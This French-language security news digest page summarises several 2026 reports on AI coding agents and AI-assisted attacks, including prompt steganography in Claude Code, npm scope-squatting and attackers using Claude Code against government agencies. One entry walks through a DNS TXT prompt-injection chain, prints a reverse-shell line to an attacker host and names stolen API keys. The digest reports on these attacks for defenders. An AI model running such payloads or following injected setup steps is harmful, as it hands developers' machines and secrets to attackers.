Claude Code : stĂ©ganographie de prompt via marqueurs Unicode cachĂ©s dans les requĂȘtes API

🔍 Contexte : Le 30 juin 2026, un chercheur du blog Thereallo a publiĂ© une analyse technique de Claude Code (version 2.1.196), l’agent de codage d’Anthropic, dans le cadre d’un audit de confidentialitĂ© personnel. đŸ§© DĂ©couverte principale : Le binaire de Claude Code contient une fonction qui modifie silencieusement le system prompt envoyĂ© au modĂšle en substituant l’apostrophe du mot “Today’s” par diffĂ©rents caractĂšres Unicode visuellement identiques (', ’, ÊŒ, Êč) et en changeant le sĂ©parateur de date (- → /). Cette technique est qualifiĂ©e de stĂ©ganographie de prompt. ...

11 juillet 2026 Â· 3 min

Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt

🔍 Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique d’une attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code d’Anthropic. ⚙ MĂ©canisme de l’attaque L’attaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError s’il n’est pas initialisĂ©, incitant l’agent Ă  exĂ©cuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă  bash -c. L’enregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đŸ’„ Impact Shell interactif s’exĂ©cutant avec les droits de l’utilisateur dĂ©veloppeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par l’agent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă  tout moment en Ă©ditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre d’emploi, un tutoriel ou un message Slack suffit Ă  compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...

29 juin 2026 Â· 3 min

@withgoogle/stitch-sdk : scope squat npm pour vol de credentials développeurs

🎯 Contexte Analyse publiĂ©e le 20 juin 2026 par SafeDep sur la dĂ©couverte d’un package npm malveillant @withgoogle/stitch-sdk (versions v0.1.1 et v0.1.2), conçu pour imiter le SDK officiel de Google Stitch AI (@google/stitch-sdk, 30 000+ tĂ©lĂ©chargements hebdomadaires). 🔍 Technique d’attaque : Scope Squatting L’attaquant a exploitĂ© le fait que npm ne vĂ©rifie pas les marques dĂ©posĂ©es lors de l’enregistrement de scopes. Le produit Google est accessible via stitch.withgoogle.com, mais son scope npm officiel est @google. L’attaquant a enregistrĂ© le scope @withgoogle (premier arrivĂ©, premier servi) et publiĂ© un package avec le mĂȘme nom de base que le SDK lĂ©gitime, avec des numĂ©ros de version identiques (0.1.1, 0.1.2). ...

23 juin 2026 Â· 3 min

Des hackers utilisent Claude et Codex comme agents autonomes pour compromettre des entreprises

🔍 Contexte PubliĂ© le 16 juin 2026 par OALABS (OpenAnalysis), cet article prĂ©sente une analyse forensique inĂ©dite de plus de 1 000 sessions d’agents IA rĂ©cupĂ©rĂ©es sur un serveur compromis ayant servi de pivot Ă  un attaquant. La source primaire est le rĂ©pertoire de travail de l’attaquant, copiĂ© avant nettoyage du serveur. đŸ§© Vecteur initial et chaĂźne de compromission L’attaquant a volĂ© une instance Claude Code appartenant Ă  un dĂ©veloppeur tchĂšque hĂ©bergĂ©e sur un serveur Hetzner. Ce dĂ©veloppeur avait des pratiques de sĂ©curitĂ© dĂ©faillantes (credentials collĂ©s dans les prompts, services exposĂ©s sur internet, mots de passe simples). Le 2 fĂ©vrier 2026, le serveur du dĂ©veloppeur est compromis ; le 16 fĂ©vrier 2026, l’intĂ©gralitĂ© de l’instance Claude (avec tout l’historique de sessions) est copiĂ©e sur un hĂŽte Vultr contrĂŽlĂ© par l’attaquant. ...

21 juin 2026 Â· 4 min

Anthropic cartographie l'usage malveillant de l'IA sur MITRE ATT&CK : 832 comptes analysés

đŸ—“ïž Contexte PubliĂ© le 3 juin 2026 par Anthropic (Kyla Guru, Alex Moix, Jacob Klein), ce rapport analyse 832 comptes bannis de la plateforme Claude entre mars 2025 et mars 2026 pour violation de la politique d’utilisation liĂ©e Ă  des activitĂ©s cyber malveillantes. Les rĂ©sultats ont partiellement alimentĂ© le Verizon Data Breach Investigation Report (DBIR) 2026. 📊 MĂ©thodologie 13 873 observations d’activitĂ©s malveillantes mappĂ©es sur le framework MITRE ATT&CK V18 482 sous-techniques uniques couvrant les 14 tactiques ATT&CK Nouveau score de risque : ARiES (AI Risk Enablement Score), composite de 0 Ă  100 basĂ© sur trois dimensions : Threat (0–35), Vulnerability (0–35), Impact (0–30) DonnĂ©es collectĂ©es via Claude.ai, Claude Code et l’API Anthropic 🔑 RĂ©sultats clĂ©s 1. Croissance du risque : ...

7 juin 2026 Â· 4 min

Pwn2Own Berlin 2026 : l'IA redéfinit les frontiÚres du hacking éthique et offensif

📰 Source : BBC News, publiĂ© le 27 mai 2026. Article de presse gĂ©nĂ©raliste couvrant la compĂ©tition Pwn2Own Berlin 2026 et les implications de l’IA sur la recherche en vulnĂ©rabilitĂ©s. 🏆 Contexte compĂ©titif La compĂ©tition Pwn2Own, organisĂ©e par la ZeroDay Initiative, a rĂ©compensĂ© des hackers Ă©thiques Ă  Berlin. PrĂšs de 1,3 million de dollars ont Ă©tĂ© distribuĂ©s pour 47 nouvelles mĂ©thodes de hacking dĂ©couvertes sur divers logiciels et systĂšmes. La hackeuse Valentina Palmiotti (alias Chompie), chercheuse en sĂ©curitĂ© chez IBM X-Force, a remportĂ© 20 000 $ pour un hack liĂ© Ă  Nvidia et 50 000 $ pour une intrusion sur un systĂšme Linux. Le hacker Orange Tsai (Taiwan) a menĂ© son Ă©quipe Ă  gagner 375 000 $ grĂące Ă  des chemins d’attaque complexes. ...

31 mai 2026 Â· 3 min

Bissa Scanner : exploitation de masse assistée par IA et collecte de credentials à grande échelle

🔍 Contexte Rapport publiĂ© le 22 avril 2026 par The DFIR Report, basĂ© sur l’analyse d’un serveur exposĂ© appartenant Ă  un opĂ©rateur malveillant. Le serveur contenait plus de 13 000 fichiers rĂ©partis dans 150+ rĂ©pertoires liĂ©s Ă  l’exploitation, la collecte de credentials et la gestion de workflow. 🎯 Nature de l’opĂ©ration L’opĂ©ration repose sur la plateforme modulaire Bissa Scanner, un outil d’exploitation Ă  grande Ă©chelle intĂ©grant des capacitĂ©s d’IA (Claude Code et OpenClaw) pour l’orchestration, le dĂ©pannage et le raffinement du pipeline de collecte. L’opĂ©rateur est identifiĂ© via Telegram sous le pseudonyme @BonJoviGoesHard (display name “Dr. Tube”, user ID 1609309278). ...

22 avril 2026 Â· 3 min

Rapport CSA/SANS : Claude Mythos d'Anthropic dĂ©clenche une tempĂȘte de vulnĂ©rabilitĂ©s IA

🌐 Contexte PubliĂ© le 13 avril 2026 par la Cloud Security Alliance (CSA), SANS Institute, [un]prompted et l’OWASP Gen AI Security Project, ce document de stratĂ©gie (version 0.4) analyse l’émergence de Claude Mythos (Preview) d’Anthropic comme point d’inflexion majeur dans la dĂ©couverte automatisĂ©e de vulnĂ©rabilitĂ©s et l’exploitation offensive par IA. ⚡ ÉvĂ©nement dĂ©clencheur : Claude Mythos & Project Glasswing Anthropic a annoncĂ© le 7 avril 2026 le modĂšle Claude Mythos Preview, accompagnĂ© du Project Glasswing, dĂ©crit comme le plus grand effort de coordination multi-parties de l’histoire pour la divulgation de vulnĂ©rabilitĂ©s. Mythos se distingue par : ...

14 avril 2026 Â· 4 min

Campagne AI-assistée contre 9 agences gouvernementales mexicaines : Claude & GPT-4.1 comme outils offensifs

🔍 Contexte Rapport technique publiĂ© le 10 avril 2026 par Gambit Security (Eyal Sela, Director of Threat Intelligence). L’analyse est basĂ©e sur des matĂ©riaux forensiques rĂ©cupĂ©rĂ©s depuis trois VPS utilisĂ©s dans la campagne, incluant des logs de sessions AI, des scripts d’exploitation et des rapports de reconnaissance automatisĂ©s. 🎯 Victimes et pĂ©rimĂštre Entre fin dĂ©cembre 2025 et mi-fĂ©vrier 2026, neuf organisations gouvernementales mexicaines ont Ă©tĂ© compromises : SAT (Servicio de AdministraciĂłn Tributaria) : 195M dossiers fiscaux + 52M annuaires exfiltrĂ©s, compromission domaine-wide, API de requĂȘte live construite et exposĂ©e publiquement, mĂ©canisme de falsification de certificats fiscaux opĂ©rationnalisĂ©, 305 serveurs internes analysĂ©s Estado de Mexico : 15,5M dossiers vĂ©hicules, 3,6M propriĂ©taires, millions de dossiers population Registro Civil CDMX : ~220M dossiers civils, centaines de dossiers judiciaires, milliers de credentials employĂ©s Jalisco : 50K dossiers patients, 17K victimes violences domestiques, 36K employĂ©s santĂ©, 180K dossiers numĂ©riques ; infrastructure virtualisation complĂšte compromise (cluster Nutanix 13 nƓuds, 37/38 serveurs DB) ; rootkits dĂ©ployĂ©s sur 20 agences INE (Instituto Nacional Electoral) : 13,8K dossiers cartes Ă©lecteurs exfiltrĂ©s, pool estimĂ© Ă  dizaines de millions MichoacĂĄn : 2,28M dossiers propriĂ©tĂ©s, 2K comptes avec mots de passe en clair SADM Monterrey : 3,5K dossiers achats/fournisseurs, 5K dossiers appels d’offres Tamaulipas : Compromission Active Directory Salud CDMX : Exploitation serveur Zimbra đŸ€– RĂŽle des plateformes AI Claude Code (Anthropic) a gĂ©nĂ©rĂ© et exĂ©cutĂ© ~75% des commandes d’exĂ©cution distante via son interface tool-use. Il a servi d’assistant d’exploitation interactif : Ă©criture d’exploits, construction de tunnels, cartographie d’architecture, escalade de privilĂšges, harvesting de credentials, anti-forensics. ...

12 avril 2026 Â· 10 min

Claude Mythos Preview : un LLM capable de découvrir et exploiter des zero-days autonomement

🧠 Contexte PubliĂ© le 7 avril 2026 sur le blog de recherche d’Anthropic, cet article technique prĂ©sente les capacitĂ©s en cybersĂ©curitĂ© de Claude Mythos Preview, un nouveau modĂšle de langage gĂ©nĂ©ral. En rĂ©ponse Ă  ces capacitĂ©s, Anthropic annonce le lancement de Project Glasswing, un effort coordonnĂ© pour utiliser Mythos Preview Ă  des fins dĂ©fensives sur les logiciels critiques. 🔍 CapacitĂ©s offensives documentĂ©es Mythos Preview dĂ©montre des capacitĂ©s autonomes de dĂ©couverte et d’exploitation de vulnĂ©rabilitĂ©s : ...

8 avril 2026 Â· 4 min
Derniùre mise à jour le: 14 juillet 2026 📝